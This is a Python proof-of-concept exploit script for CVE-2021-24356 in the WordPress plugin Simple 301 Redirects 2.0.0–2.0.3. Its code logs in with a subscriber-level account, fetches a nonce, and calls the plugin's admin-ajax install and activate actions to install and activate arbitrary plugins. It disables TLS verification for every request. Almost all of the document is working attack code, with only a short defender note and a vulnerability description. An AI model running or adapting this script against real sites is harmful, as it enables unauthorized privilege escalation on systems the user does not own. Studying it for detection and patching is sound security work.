#!/usr/bin/env python3
"""Proof-of-concept for CVE-2021-24356 (details in DESCRIPTION below).

Flow, exactly as implemented in login_and_activate_plugin():
  1. Authenticate against <siteurl>/wp-login.php with the supplied account.
  2. Fetch a nonce from <siteurl>/wp-admin/admin-ajax.php?action=rest-nonce.
  3. POST admin-ajax action ``simple301redirects/admin/install_plugin`` and
     then ``simple301redirects/admin/activate_plugin``, sending that nonce
     as the ``security`` field.

Defender notes (from DESCRIPTION): the affected Simple 301 Redirects versions
are 2.0.0 - 2.0.3, and the weakness is missing capability checks on the
``activate_plugin`` AJAX action. The server-side signal to look for is an
admin-ajax POST carrying one of the two actions above from a low-privilege
(Subscriber+) session.
"""
import requests
import argparse
import os
#
# Exploit script by @RandomRobbieBF
#
# Optional intercepting proxy; left empty here. requests reads HTTP_PROXY /
# HTTPS_PROXY from the environment, so these two lines control every request.
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL
# Silences urllib3's warning for the verify=False requests below; certificate
# validation itself is disabled per-session / per-call further down.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def login_and_activate_plugin(siteurl: str, wp_user: str, wp_pass: str, slug: str) -> None:
    """Log in to *siteurl*, then install and activate the plugin *slug*.

    Args:
        siteurl: Base URL of the WordPress site. It is concatenated with
            '/wp-login.php' and '/wp-admin/admin-ajax.php' below.
        wp_user: WordPress username sent in the login form's ``log`` field.
        wp_pass: Password sent in the ``pwd`` field.
        slug: Plugin slug. The activate step assumes the plugin's main file
            is ``<slug>/<slug>.php``.

    Returns:
        None. Each server response body is printed; none is checked.
    """
    # Log in
    session = requests.Session()
    session.verify = False  # Ignore SSL verification
    # TLS certificate checks are off for every request, so the credentials
    # below are sent without any server authentication.
    login_url = siteurl + '/wp-login.php'
    response = session.post(login_url, verify=False, data={
        'log': wp_user,
        'pwd': wp_pass,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    })
    # NOTE(review): `response` is never inspected, so a failed login is only
    # noticed when the later steps return unexpected output.

    # Get REST API Nonce
    print('Getting REST API Nonce!')
    nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce'
    nonce_response = session.get(nonce_url)
    # The response body is used verbatim as the `security` value of both
    # plugin actions below.
    rest_nonce = nonce_response.text.strip()
    print("Nonce Found: "+rest_nonce+"")

    # Install Plugin
    print('Installing Plugin!')
    paramsPost = {"action":"simple301redirects/admin/install_plugin","security":rest_nonce,"slug":slug}
    # NOTE(review): the Referer here is siteurl + "wp-admin/..." with no
    # separator, while the activate step below hard-codes http://wordpress.lan;
    # the script itself never relies on either value.
    headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":""+siteurl+"wp-admin/options-general.php?page=301options","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
    install_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False)
    print(install_response.text)

    # Activate Plugin
    print('Activating Plugin!')
    # Plugin "basename" as WordPress expects it: <slug>/<slug>.php.
    sluga = ""+slug+"/"+slug+".php"
    paramsPost = {"action":"simple301redirects/admin/activate_plugin","security":rest_nonce,"basename":sluga}
    headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":"http://wordpress.lan/wp-admin/options-general.php?page=301options","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
    activate_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False)
    print(activate_response.text)


# Add the vulnerability description as a comment
DESCRIPTION = """
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber+ Arbitrary Plugin Activation
Description
CVE-2021-24356 - In the plugin, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites.
"""

if __name__ == '__main__':
    # All four arguments are mandatory; DESCRIPTION doubles as the --help text.
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--username', required=True, help='WordPress username')
    parser.add_argument('--password', required=True, help='WordPress password')
    parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
    args = parser.parse_args()
    login_and_activate_plugin(args.url, args.username, args.password,args.slug)